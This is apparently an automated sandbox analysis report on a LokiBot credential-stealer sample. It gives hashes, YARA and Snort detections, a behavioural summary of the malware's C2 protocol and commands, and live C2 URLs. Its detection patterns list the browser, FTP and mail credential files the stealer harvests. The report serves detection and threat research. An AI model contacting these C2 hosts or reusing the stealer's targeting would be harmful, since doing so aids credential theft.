Edit tour

Windows Analysis Report
wi7zJOZT2r.exe

Overview

General Information

Sample Name:	wi7zJOZT2r.exe
Original Sample Name:	3dc7d72c3b38ce465684f96faeaa0ce7.exe
Analysis ID:	1283498
MD5:	3dc7d72c3b38ce465684f96faeaa0ce7
SHA1:	491568fcf9f2e718d587621361b0e82b681c9b8d
SHA256:	5388ab765bd614a7350d9ce7126afab89ca2e0b0e55d23e1cd43459cb9bc745d
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Lokibot

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Classification

Process Tree

System is w10x64

wi7zJOZT2r.exe (PID: 7088 cmdline: C:\Users\user\Desktop\wi7zJOZT2r.exe MD5: 3DC7D72C3B38CE465684F96FAEAA0CE7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
wi7zJOZT2r.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
wi7zJOZT2r.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
wi7zJOZT2r.exe	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
wi7zJOZT2r.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
wi7zJOZT2r.exe	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
wi7zJOZT2r.exe	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
wi7zJOZT2r.exe	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
wi7zJOZT2r.exe	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 3 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: wi7zJOZT2r.exe PID: 7088	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: wi7zJOZT2r.exe PID: 7088	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: wi7zJOZT2r.exe PID: 7088	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: wi7zJOZT2r.exe PID: 7088	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x8f30:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x10af2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.wi7zJOZT2r.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.wi7zJOZT2r.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.wi7zJOZT2r.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.0.wi7zJOZT2r.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.0.wi7zJOZT2r.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.0.wi7zJOZT2r.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.0.wi7zJOZT2r.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.0.wi7zJOZT2r.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.wi7zJOZT2r.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wi7zJOZT2r.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.wi7zJOZT2r.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.wi7zJOZT2r.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.wi7zJOZT2r.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.wi7zJOZT2r.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.wi7zJOZT2r.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.wi7zJOZT2r.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 11 entries

Snort Signatures

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149697802021641 08/01/23-04:47:03.589313
SID:	2021641
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149697802024317 08/01/23-04:47:03.589313
SID:	2024317
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149702802825766 08/01/23-04:47:05.661750
SID:	2825766
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149697802024312 08/01/23-04:47:03.589313
SID:	2024312
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149699802825766 08/01/23-04:47:04.225849
SID:	2825766
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149697802025381 08/01/23-04:47:03.589313
SID:	2025381
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149701802825766 08/01/23-04:47:04.869622
SID:	2825766
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149701802024318 08/01/23-04:47:04.869622
SID:	2024318
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149701802021641 08/01/23-04:47:04.869622
SID:	2021641
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149700802825766 08/01/23-04:47:04.525369
SID:	2825766
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149699802024313 08/01/23-04:47:04.225849
SID:	2024313
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149700802024318 08/01/23-04:47:04.525369
SID:	2024318
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149698802024317 08/01/23-04:47:03.996311
SID:	2024317
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149702802025381 08/01/23-04:47:05.661750
SID:	2025381
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149701802024313 08/01/23-04:47:04.869622
SID:	2024313
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149698802021641 08/01/23-04:47:03.996311
SID:	2021641
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149698802825766 08/01/23-04:47:03.996311
SID:	2825766
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149699802025381 08/01/23-04:47:04.225849
SID:	2025381
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149698802024312 08/01/23-04:47:03.996311
SID:	2024312
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149701802025381 08/01/23-04:47:04.869622
SID:	2025381
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149699802024318 08/01/23-04:47:04.225849
SID:	2024318
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149702802024313 08/01/23-04:47:05.661750
SID:	2024313
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149702802021641 08/01/23-04:47:05.661750
SID:	2021641
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149700802024313 08/01/23-04:47:04.525369
SID:	2024313
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149697802825766 08/01/23-04:47:03.589313
SID:	2825766
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149699802021641 08/01/23-04:47:04.225849
SID:	2021641
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 216.239.32.21

Timestamp:	192.168.2.3216.239.32.2149702802024318 08/01/23-04:47:05.661750
SID:	2024318
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149700802021641 08/01/23-04:47:04.525369
SID:	2021641
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149698802025381 08/01/23-04:47:03.996311
SID:	2025381
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 216.239.38.21

Timestamp:	192.168.2.3216.239.38.2149700802025381 08/01/23-04:47:04.525369
SID:	2025381
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: wi7zJOZT2r.exe	ReversingLabs: Detection: 100%
Source: wi7zJOZT2r.exe	Virustotal: Detection: 88%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: wi7zJOZT2r.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://publicspeaking.co.id/cjay/Panel/five/fre.php8	Avira URL Cloud: Label: malware
Source: https://publicspeaking.co.id/cjay/Panel/five/fre.php	Avira URL Cloud: Label: malware
Source: http://publicspeaking.co.id/cjay/Panel/five/fre.php	Avira URL Cloud: Label: malware
Source: http://www.publicspeaking.co.id/cjay/Panel/five/fre.php	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://publicspeaking.co.id/cjay/Panel/five/fre.php	Virustotal: Detection: 10%			Perma Link
Source: publicspeaking.co.id	Virustotal: Detection: 16%			Perma Link

Machine Learning detection for sample

Source: wi7zJOZT2r.exe

Joe Sandbox ML: detected

Source: wi7zJOZT2r.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\wi7zJOZT2r.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49697 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49697 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49697 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49697 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49697 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49698 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49698 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49698 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49698 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49698 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49699 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49699 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49699 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49699 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49699 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49700 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49700 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49700 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49700 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49700 -> 216.239.38.21:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49701 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49701 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49701 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49701 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49701 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49702 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49702 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49702 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49702 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49702 -> 216.239.32.21:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

